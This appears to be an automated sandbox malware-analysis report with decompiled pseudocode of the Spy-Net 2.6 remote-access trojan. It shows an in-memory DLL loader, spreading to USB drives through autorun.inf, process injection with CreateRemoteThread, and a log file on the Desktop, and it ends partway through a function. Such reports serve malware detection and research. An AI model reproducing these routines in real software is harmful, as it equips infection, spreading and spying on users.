					RegCloseKey(_v16);
					E24023024(_v52, _t213, _v12);
					E24012688(_v52);
				}
				_pop(_t219);
				 *[fs:eax] = _t219;
				_push(0x2402b10b);
				E240130AC( &_v844, 5);
				E240130AC( &_v44, 3);
				return E24013088( &_v8);
			}







































                                    0x2402ad24
                                    0x2402ad2d
                                    0x2402ad32
                                    0x2402ad38
                                    0x2402ad3e
                                    0x2402ad44
                                    0x2402ad4a
                                    0x2402ad50
                                    0x2402ad53
                                    0x2402ad56
                                    0x2402ad59
                                    0x2402ad5c
                                    0x2402ad62
                                    0x2402ad69
                                    0x2402ad6a
                                    0x2402ad6f
                                    0x2402ad72
                                    0x2402ad78
                                    0x2402ad7d
                                    0x2402ad81
                                    0x2402ad8a
                                    0x2402ad8b
                                    0x2402ad8d
                                    0x2402ad95
                                    0x2402ada4
                                    0x2402ada8
                                    0x2402adb2
                                    0x2402adb3
                                    0x2402adbe
                                    0x2402adda
                                    0x2402ade3
                                    0x2402adf4
                                    0x2402adfb
                                    0x2402ae08
                                    0x2402ae18
                                    0x2402ae1b
                                    0x2402ae34
                                    0x2402ae40
                                    0x2402ae42
                                    0x2402ae42
                                    0x2402ae51
                                    0x2402ae53
                                    0x2402ae77
                                    0x2402ae7b
                                    0x2402ae84
                                    0x2402ae8d
                                    0x2402aedf
                                    0x2402aee3
                                    0x2402af50
                                    0x2402af54
                                    0x2402af92
                                    0x2402af56
                                    0x2402af59
                                    0x2402af5a
                                    0x2402af5c
                                    0x2402af5e
                                    0x2402af5e
                                    0x2402af5f
                                    0x2402af62
                                    0x2402af69
                                    0x2402af69
                                    0x2402af6c
                                    0x2402af70
                                    0x2402af75
                                    0x2402af75
                                    0x2402af79
                                    0x2402af7c
                                    0x2402af7c
                                    0x2402af7c
                                    0x2402af7c
                                    0x2402af69
                                    0x2402af86
                                    0x2402af86
                                    0x2402aee5
                                    0x2402aee5
                                    0x2402aee9
                                    0x2402af00
                                    0x2402af01
                                    0x2402af03
                                    0x2402af09
                                    0x2402af09
                                    0x2402af0a
                                    0x2402af0d
                                    0x2402af14
                                    0x2402af14
                                    0x2402af29
                                    0x2402af2e
                                    0x2402af34
                                    0x2402af41
                                    0x2402af46
                                    0x2402af49
                                    0x2402af49
                                    0x2402af49
                                    0x2402af49
                                    0x2402af4e
                                    0x2402aeeb
                                    0x2402aef3
                                    0x2402aef3
                                    0x2402aee9
                                    0x2402ae8f
                                    0x2402ae8f
                                    0x2402ae98
                                    0x2402aea5
                                    0x2402aeaa
                                    0x2402aeb0
                                    0x2402aebd
                                    0x2402aec2
                                    0x2402aec8
                                    0x2402aed5
                                    0x2402aed5
                                    0x2402af9a
                                    0x2402afb0
                                    0x2402af9c
                                    0x2402afa4
                                    0x2402afa4
                                    0x2402afb5
                                    0x2402afbb
                                    0x2402afc1
                                    0x00000000
                                    0x2402b042
                                    0x2402b045
                                    0x2402b04a
                                    0x00000000
                                    0x00000000
                                    0x2402b051
                                    0x2402b054
                                    0x2402b059
                                    0x00000000
                                    0x00000000
                                    0x2402b015
                                    0x2402b018
                                    0x2402b01d
                                    0x00000000
                                    0x00000000
                                    0x2402aff0
                                    0x00000000
                                    0x00000000
                                    0x2402aff7
                                    0x2402affa
                                    0x2402afff
                                    0x00000000
                                    0x00000000
                                    0x2402b006
                                    0x2402b009
                                    0x2402b00e
                                    0x00000000
                                    0x00000000
                                    0x2402b024
                                    0x2402b027
                                    0x2402b02c
                                    0x00000000
                                    0x00000000
                                    0x2402b033
                                    0x2402b036
                                    0x2402b03b
                                    0x00000000
                                    0x00000000
                                    0x2402afc1
                                    0x2402b05e
                                    0x2402b06c
                                    0x2402b07f
                                    0x2402b092
                                    0x2402b09d
                                    0x2402b0a5
                                    0x2402b0aa
                                    0x2402b0aa
                                    0x2402b0ad
                                    0x2402b0b9
                                    0x2402b0c4
                                    0x2402b0cc
                                    0x2402b0cc
                                    0x2402b0d3
                                    0x2402b0d6
                                    0x2402b0d9
                                    0x2402b0e9
                                    0x2402b0f6
                                    0x2402b103

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000001,?,00000000,2402B104), ref: 2402ADF4
                                    • RegEnumValueA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,00000001,?,00000000), ref: 2402AE34
                                    • RegEnumValueA.ADVAPI32(?,?,00000000,00003FFF,00000000,?,00000000,00003FFF,?,?,00000000,?,00000000,?,00000000,?), ref: 2402AE72
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: EnumValue$Open
                                    • String ID: (Default)$(Empty)$REG_BINARY$REG_DWORD$REG_DWORD_BIG_ENDIAN$REG_EXPAND_SZ$REG_LINK$REG_MULTI_SZ$REG_NONE$REG_SZ
                                    • API String ID: 1214633557-2843546354
                                    • Opcode ID: 25a180eefb73874bb5c49ad9faa0ce83b91ba38d871c07ba4ed221fb77b46527
                                    • Instruction ID: 826a2c8ad50f91c2a923b36951061371a61d3372b588d25ccef054f8f5192549
                                    • Opcode Fuzzy Hash: 25a180eefb73874bb5c49ad9faa0ce83b91ba38d871c07ba4ed221fb77b46527
                                    • Instruction Fuzzy Hash: 9CB1F970A046199FEF51DFA5C880AEEB7F9BF58304F5040A5E508B7288DB74ABC58F61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24023DDC, Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 183COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 80%
                                    			E24023DDC(void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				short _v76;
				long _v240;
				long _v244;
				void* _v272;
				char _v324;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t63;
				void* _t69;
				void* _t76;
				void* _t80;
				void* _t102;
				intOrPtr _t123;
				void* _t125;
				intOrPtr _t130;
				intOrPtr _t132;
				intOrPtr _t134;
				void* _t135;
				void* _t136;
				void* _t138;
				intOrPtr _t140;
				void* _t142;

				_t142 = __fp0;
				_t137 = _a4;
				_v12 = 0;
				_v8 = 0;
				_push(0x24023fe8);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t140;
				E24015460( &_v76,  *_a4);
				if(_v76 == 0x5a4d) {
					E24015460( &_v324,  *_t137 + _v16);
					__eflags = _v324 - 0x4550;
					if(_v324 == 0x4550) {
						_t102 = VirtualAlloc(_v272, _v244, 0x2000, 0x40);
						__eflags = _t102;
						if(_t102 == 0) {
							_t102 = VirtualAlloc(0, _v244, 0x2000, 0x40);
						}
						__eflags = _t102;
						if(__eflags != 0) {
							_v12 = RtlAllocateHeap(GetProcessHeap(), 0, 0x11);
							 *(_v12 + 4) = _t102;
							 *((intOrPtr*)(_v12 + 0xc)) = 0;
							 *((intOrPtr*)(_v12 + 8)) = 0;
							 *((char*)(_v12 + 0x10)) = 0;
							VirtualAlloc(_t102, _v244, 0x1000, 0x40);
							_t135 = VirtualAlloc(_t102, _v240, 0x1000, 0x40);
							E24015460(_t135,  *_t137);
							_t63 = _t135 + _v16;
							 *_v12 = _t63;
							_t136 = _t102;
							 *(_t63 + 0x34) = _t136;
							E2402388C(__eflags,  *_t137,  &_v324, _v12);
							_t69 = _t136 - _v272;
							__eflags = _t69;
							if(_t69 != 0) {
								E24023930(_t142, _v12, _t69);
							}
							__eflags = E24023A08(_t102, _t136, _t137, _v12);
							if(__eflags == 0) {
								E24013344(0x2405bb68, " BTMemoryLoadLibary: BuildImportTable failed");
							}
							E24023CEC(__eflags, _v12);
							_t76 =  *( *_v12 + 0x28);
							__eflags = _t76;
							if(_t76 != 0) {
								_t125 = _t76 + _t136;
								_t138 = _t125;
								__eflags = _t125;
								if(_t125 == 0) {
									E240130DC(0x2405bb68, "BTMemoryLoadLibary: Get DLLEntyPoint failed");
								}
								_t80 =  *_t138(_t136, 1, 0);
								__eflags = _t80 - 1;
								asm("sbb eax, eax");
								__eflags = _t80 + 1;
								if(_t80 + 1 == 0) {
									E240130DC(0x2405bb68, "BTMemoryLoadLibary: Can\'t attach library");
								}
								 *((char*)(_v12 + 0x10)) = 1;
							}
							_pop(_t123);
							 *[fs:eax] = _t123;
							_v8 = _v12;
						} else {
							E240130DC(0x2405bb68, "BTMemoryLoadLibary: VirtualAlloc failed");
							_pop(_t130);
							 *[fs:eax] = _t130;
						}
					} else {
						E240130DC(0x2405bb68, "BTMemoryLoadLibary: IMAGE_NT_SIGNATURE is not valid");
						_pop(_t132);
						 *[fs:eax] = _t132;
					}
				} else {
					E240130DC(0x2405bb68, "BTMemoryLoadLibary: dll dos header is not valid");
					_pop(_t134);
					 *[fs:eax] = _t134;
				}
				return _v8;
			}






























                                    0x24023ddc
                                    0x24023de8
                                    0x24023ded
                                    0x24023df2
                                    0x24023df8
                                    0x24023dfd
                                    0x24023e00
                                    0x24023e0d
                                    0x24023e18
                                    0x24023e46
                                    0x24023e4b
                                    0x24023e55
                                    0x24023e8d
                                    0x24023e8f
                                    0x24023e91
                                    0x24023ea8
                                    0x24023ea8
                                    0x24023eaa
                                    0x24023eac
                                    0x24023ed9
                                    0x24023edf
                                    0x24023ee7
                                    0x24023eef
                                    0x24023ef5
                                    0x24023f08
                                    0x24023f21
                                    0x24023f30
                                    0x24023f37
                                    0x24023f3d
                                    0x24023f3f
                                    0x24023f41
                                    0x24023f52
                                    0x24023f59
                                    0x24023f5f
                                    0x24023f61
                                    0x24023f68
                                    0x24023f68
                                    0x24023f76
                                    0x24023f78
                                    0x24023f84
                                    0x24023f84
                                    0x24023f8d
                                    0x24023f97
                                    0x24023f9a
                                    0x24023f9c
                                    0x24023fa0
                                    0x24023fa2
                                    0x24023fa4
                                    0x24023fa6
                                    0x24023fb2
                                    0x24023fb2
                                    0x24023fbc
                                    0x24023fbe
                                    0x24023fc1
                                    0x24023fc4
                                    0x24023fc6
                                    0x24023fd2
                                    0x24023fd2
                                    0x24023fda
                                    0x24023fda
                                    0x24023fe0
                                    0x24023fe3
                                    0x24024005
                                    0x24023eae
                                    0x24023eb8
                                    0x24023ebf
                                    0x24023ec2
                                    0x24023ec2
                                    0x24023e57
                                    0x24023e61
                                    0x24023e68
                                    0x24023e6b
                                    0x24023e6b
                                    0x24023e1a
                                    0x24023e24
                                    0x24023e2b
                                    0x24023e2e
                                    0x24023e2e
                                    0x24024011

                                    Strings
                                    • PE, xrefs: 24023E4B
                                    • BTMemoryLoadLibary: Get DLLEntyPoint failed, xrefs: 24023FAD
                                    • BTMemoryLoadLibary: Can't attach library, xrefs: 24023FCD
                                    • MZ, xrefs: 24023E12
                                    • BTMemoryLoadLibary: VirtualAlloc failed, xrefs: 24023EB3
                                    • BTMemoryLoadLibary: dll dos header is not valid, xrefs: 24023E1F
                                    • BTMemoryLoadLibary: IMAGE_NT_SIGNATURE is not valid, xrefs: 24023E5C
                                    • BTMemoryLoadLibary: BuildImportTable failed, xrefs: 24023F7F
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: BTMemoryLoadLibary: BuildImportTable failed$BTMemoryLoadLibary: Can't attach library$BTMemoryLoadLibary: Get DLLEntyPoint failed$BTMemoryLoadLibary: IMAGE_NT_SIGNATURE is not valid$BTMemoryLoadLibary: VirtualAlloc failed$BTMemoryLoadLibary: dll dos header is not valid$MZ$PE
                                    • API String ID: 0-3631919656
                                    • Opcode ID: a3fdd24fea7cd128e3e7310029a0cf7e4744ff52a95439504260f722dcc45f91
                                    • Instruction ID: 5638aa09819caaf77772874261cd78290d7563892cf8c3a7d6ccfdc165388388
                                    • Opcode Fuzzy Hash: a3fdd24fea7cd128e3e7310029a0cf7e4744ff52a95439504260f722dcc45f91
                                    • Instruction Fuzzy Hash: CB516271B04604AFEB11CFA9C890F9DB7F9FF58718F1084A5E608EB295D6B0D9C18B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24055928, Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 116fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 43%
                                    			E24055928(void* __ebx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				void* __ecx;
				CHAR* _t50;
				intOrPtr* _t87;
				intOrPtr _t89;
				void* _t94;
				intOrPtr _t113;
				intOrPtr _t117;
				intOrPtr _t118;

				_t115 = __esi;
				_t117 = _t118;
				_t89 = 6;
				do {
					_push(0);
					_push(0);
					_t89 = _t89 - 1;
					_t119 = _t89;
				} while (_t89 != 0);
				_t1 =  &_v8;
				 *_t1 = _t89;
				_v8 =  *_t1;
				E24013524(_v8);
				_t87 =  *0x2405ac24; // 0x2405b980
				_push(_t117);
				_push(0x24055ac4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t118;
				E24013388( &_v12, "RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\", _v8);
				E24017450(_v12, _t87, _t119);
				E24015878( *_t87, "RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\",  &_v24);
				_t92 = _v24;
				E24013388( &_v20, _v24, _v12);
				_t50 = E24013534(_v20);
				CopyFileA(E24013534( *_t87), _t50, 0);
				_push("[autorun]\r\n;open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
				E24015878( *_t87, _v24,  &_v28);
				_push(_v28);
				_push(0x24055b6c);
				_push("icon=shell32.dll,4");
				_push(0x24055b6c);
				_push("shellexecute=");
				_push("RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
				E24015878( *_t87, _v24,  &_v32);
				_push(_v32);
				_push(0x24055b6c);
				_push("label=PENDRIVE");
				_push(0x24055b6c);
				_push("action=Open folder to view files");
				_push(0x24055b6c);
				_push("shell\\Open=Open");
				_push(0x24055b6c);
				_push("shell\\Open\\command=");
				_push("RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
				E24015878( *_t87, _t92,  &_v36);
				_push(_v36);
				_push(0x24055b6c);
				_push("shell\\Open\\Default=1");
				E240133FC();
				_push(E2401333C(_v16));
				E24013388( &_v40, "autorun.inf", _v8);
				_pop(_t94);
				E24016DA0(_v40, _t87, _t94, _v16, __esi, _t119);
				E24013388( &_v44, "autorun.inf", _v8);
				E24017728(_v44, _t87, __esi, _t119);
				E24013388( &_v48, "RECYCLER\\", _v8);
				E24017728(_v48, _t87, __esi, _t119);
				E24017728(_v12, _t87, _t115, _t119);
				E24015878( *_t87, "RECYCLER\\",  &_v56);
				E24013388( &_v52, _v56, _v12);
				E24017728(_v52, _t87, _t115, _t119);
				_pop(_t113);
				 *[fs:eax] = _t113;
				_push(0x24055acb);
				return E240130AC( &_v56, 0xd);
			}
























                                    0x24055928
                                    0x24055929
                                    0x2405592c
                                    0x24055931
                                    0x24055931
                                    0x24055933
                                    0x24055935
                                    0x24055935
                                    0x24055935
                                    0x24055938
                                    0x24055938
                                    0x2405593c
                                    0x24055942
                                    0x24055947
                                    0x2405594f
                                    0x24055950
                                    0x24055955
                                    0x24055958
                                    0x24055966
                                    0x2405596e
                                    0x2405597a
                                    0x2405597f
                                    0x24055988
                                    0x24055990
                                    0x2405599e
                                    0x240559a3
                                    0x240559ad
                                    0x240559b2
                                    0x240559b5
                                    0x240559ba
                                    0x240559bf
                                    0x240559c4
                                    0x240559c9
                                    0x240559d3
                                    0x240559d8
                                    0x240559db
                                    0x240559e0
                                    0x240559e5
                                    0x240559ea
                                    0x240559ef
                                    0x240559f4
                                    0x240559f9
                                    0x240559fe
                                    0x24055a03
                                    0x24055a0d
                                    0x24055a12
                                    0x24055a15
                                    0x24055a1a
                                    0x24055a27
                                    0x24055a34
                                    0x24055a40
                                    0x24055a4b
                                    0x24055a4c
                                    0x24055a5c
                                    0x24055a64
                                    0x24055a74
                                    0x24055a7c
                                    0x24055a84
                                    0x24055a8e
                                    0x24055a9c
                                    0x24055aa4
                                    0x24055aab
                                    0x24055aae
                                    0x24055ab1
                                    0x24055ac3

                                    APIs
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 2405599E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CopyFile
                                    • String ID: RECYCLER\$RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$action=Open folder to view files$autorun.inf$icon=shell32.dll,4$label=PENDRIVE$shell\Open=Open$shell\Open\Default=1$shell\Open\command=$shellexecute=
                                    • API String ID: 1304948518-631342129
                                    • Opcode ID: 347498723349dc8d2e585895e3b3ff9e5180e6509c53eca6c6437bff1f64b86d
                                    • Instruction ID: bfebc3fbeaf63f4b613aede6aa2103807c4c132b5100591409c8784ac4b4035c
                                    • Opcode Fuzzy Hash: 347498723349dc8d2e585895e3b3ff9e5180e6509c53eca6c6437bff1f64b86d
                                    • Instruction Fuzzy Hash: D041CA34A10109EBEF00EBA5D8D0E9EBBB5FF59204F6045A4F405BB26CDB74AE858F54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2405412C, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloadersynchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2405412C(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v20;
				long _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				void* _t24;
				void* _t31;
				long _t32;
				void* _t33;
				DWORD* _t34;

				_t25 = __ecx;
				_t34 =  &_v24;
				_t33 = __ecx;
				_t31 = __edx;
				_t23 = __eax;
				_t32 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
				_v32 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
				_v36 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
				_v20 = E24053EC0(_t23, _t23, _t25, _t33, _t31, 0);
				_v24 = E24053EC0(_t23, _t23, _t25, _t31, _t31, 0);
				_t24 = E24053F80(_t23,  &_v36, E240540FC, 0, 0x14);
				if(_t24 != 0) {
					WaitForSingleObject(_t24, 0xffffffff);
					GetExitCodeThread(_t24, _t34);
					_t32 =  *_t34;
				}
				return _t32;
			}


















                                    0x2405412c
                                    0x24054130
                                    0x24054133
                                    0x24054135
                                    0x24054137
                                    0x24054139
                                    0x24054150
                                    0x24054169
                                    0x24054182
                                    0x2405418f
                                    0x2405419c
                                    0x240541b4
                                    0x240541b8
                                    0x240541bd
                                    0x240541c4
                                    0x240541c9
                                    0x240541c9
                                    0x240541d5

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA), ref: 24054145
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 2405414B
                                    • GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 2405415E
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 24054164
                                    • GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 24054177
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 2405417D
                                      • Part of subcall function 24053EC0: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,24053F3E,?,?,?,?,00000000,00000000,00000000), ref: 24053EFC
                                      • Part of subcall function 24053EC0: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,24053F3E), ref: 24053F1E
                                      • Part of subcall function 24053F80: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 24053FBE
                                      • Part of subcall function 24053F80: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000,00000000,?), ref: 24053FCE
                                      • Part of subcall function 24053F80: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF,?,00000000,00000000,00000000,00000000,00000000,?), ref: 24053FE1
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 240541BD
                                    • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 240541C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
                                    • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
                                    • API String ID: 3826234517-3123223305
                                    • Opcode ID: 857c26d249c059f29954a6ea8bfb13d4ce4fff632f161b6b0166d8a80e2c55ef
                                    • Instruction ID: 501ea7a37b6bf7497f67c2f653f5f044889ffa826b872c0320aaaf75650d9bce
                                    • Opcode Fuzzy Hash: 857c26d249c059f29954a6ea8bfb13d4ce4fff632f161b6b0166d8a80e2c55ef
                                    • Instruction Fuzzy Hash: F001C470A0431037E300AFBA4C90B5F7A9CEFA1168F904928B518BB2A9D930DE8447A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24022638, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 121fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E24022638(char __eax, void* __ebx, void* __esi) {
				char _v8;
				long _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char* _t32;
				long _t62;
				void* _t69;
				void* _t72;
				void* _t73;
				intOrPtr _t76;
				intOrPtr _t83;
				intOrPtr _t84;

				_t71 = __ebx;
				_t83 = _t84;
				_t73 = 5;
				do {
					_push(0);
					_push(0);
					_t73 = _t73 - 1;
				} while (_t73 != 0);
				_push(__ebx);
				_v8 = __eax;
				E24013524(_v8);
				_push(_t83);
				_push(0x240227c7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				_t32 =  *0x2405abb4; // 0x2405b880
				_t86 =  *_t32;
				if( *_t32 != 0) {
					E2401673C("Desktop", __ebx,  &_v20, __esi, _t86);
					_push(_v20);
					_push(0x240227ec);
					_push("Spy-Net ");
					_push("2.6");
					_push(".txt");
					E240133FC();
					if(E24016C78(_v16, _t71, _t86) == 0) {
						_t69 = CreateFileA(E24013534(_v16), 0x40000000, 2, 0, 2, 0, 0);
						_t71 = _t69;
						CloseHandle(_t69);
					}
					E24016BD0( &_v24, _t71, _t73);
					_push(_v24);
					_push(0x24022828);
					E24016B28( &_v28, _t71, _t73);
					_push(_v28);
					_push(0x24022828);
					E24016B08( &_v32);
					_push(_v32);
					_push(" --- ");
					E24016910( &_v36, _t71, _t73);
					_push(_v36);
					_push(0x24022844);
					E240169B8( &_v40, _t71, _t73);
					_push(_v40);
					_push(0x24022844);
					E24016A60( &_v44, _t71, _t73);
					_push(_v44);
					_push(0x24022850);
					_push(0x2402285c);
					_push(_v8);
					_push(0x24022850);
					_push(0x24022850);
					E240133FC();
					_t72 = CreateFileA(E24013534(_v16), 0x40000000, 2, 0, 3, 0, 0);
					if(_t72 != 0xffffffff) {
						SetFilePointer(_t72, 0, 0, 2);
						_t62 = E2401333C(_v8);
						WriteFile(_t72, E24013588( &_v8), _t62,  &_v12, 0);
						CloseHandle(_t72);
					}
				}
				_pop(_t76);
				 *[fs:eax] = _t76;
				_push(0x240227ce);
				E240130AC( &_v44, 8);
				return E24013088( &_v8);
			}





















                                    0x24022638
                                    0x24022639
                                    0x2402263b
                                    0x24022640
                                    0x24022640
                                    0x24022642
                                    0x24022644
                                    0x24022644
                                    0x24022647
                                    0x24022648
                                    0x2402264e
                                    0x24022655
                                    0x24022656
                                    0x2402265b
                                    0x2402265e
                                    0x24022661
                                    0x24022666
                                    0x24022669
                                    0x24022677
                                    0x2402267c
                                    0x2402267f
                                    0x24022684
                                    0x24022689
                                    0x2402268e
                                    0x2402269b
                                    0x240226aa
                                    0x240226c4
                                    0x240226c9
                                    0x240226cc
                                    0x240226cc
                                    0x240226d4
                                    0x240226d9
                                    0x240226dc
                                    0x240226e4
                                    0x240226e9
                                    0x240226ec
                                    0x240226f4
                                    0x240226f9
                                    0x240226fc
                                    0x24022704
                                    0x24022709
                                    0x2402270c
                                    0x24022714
                                    0x24022719
                                    0x2402271c
                                    0x24022724
                                    0x24022729
                                    0x2402272c
                                    0x24022731
                                    0x24022736
                                    0x24022739
                                    0x2402273e
                                    0x2402274b
                                    0x2402276d
                                    0x24022772
                                    0x2402277b
                                    0x24022789
                                    0x24022799
                                    0x2402279f
                                    0x2402279f
                                    0x24022772
                                    0x240227a6
                                    0x240227a9
                                    0x240227ac
                                    0x240227b9
                                    0x240227c6

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,.txt,2.6,Spy-Net ,240227EC,?,00000000,240227C7,?,2405B9C4), ref: 240226C4
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,.txt,2.6,Spy-Net ,240227EC,?,00000000,240227C7), ref: 240226CC
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000003,00000000,00000000,24022850,24022850,?,2402285C,24022850,?,24022844,?,24022844), ref: 24022768
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000,00000000,24022850,24022850,?,2402285C,24022850), ref: 2402277B
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 24022799
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000), ref: 2402279F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandle$PointerWrite
                                    • String ID: --- $.txt$2.6$Desktop$Spy-Net
                                    • API String ID: 2606874340-3792867649
                                    • Opcode ID: 8e216534eeddfb1cf8720cb4d3f8b3c6093c8a3450c7c608a61a00340cfc834f
                                    • Instruction ID: 6648cf1eb566d6334411ad375664f16ee18fc380b51f532edbf72a6296e9d5bf
                                    • Opcode Fuzzy Hash: 8e216534eeddfb1cf8720cb4d3f8b3c6093c8a3450c7c608a61a00340cfc834f
                                    • Instruction Fuzzy Hash: 2F415330940608BBFF01DBE1DC91F9E7BB8EB1C704F900468F604BA1D9D674ABC59A24
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24052F20, Relevance: 18.3, APIs: 12, Instructions: 346fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 53%
                                    			E24052F20(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t132;
				CHAR* _t135;
				intOrPtr* _t136;
				void* _t145;
				void* _t148;
				void* _t154;
				void* _t164;
				CHAR* _t167;
				intOrPtr* _t168;
				void* _t177;
				void* _t180;
				void* _t186;
				void* _t196;
				CHAR* _t199;
				intOrPtr* _t200;
				void* _t209;
				void* _t212;
				void* _t218;
				void* _t228;
				CHAR* _t231;
				intOrPtr* _t232;
				void* _t241;
				void* _t244;
				void* _t250;
				void* _t260;
				CHAR* _t263;
				intOrPtr* _t264;
				void* _t273;
				void* _t276;
				void* _t282;
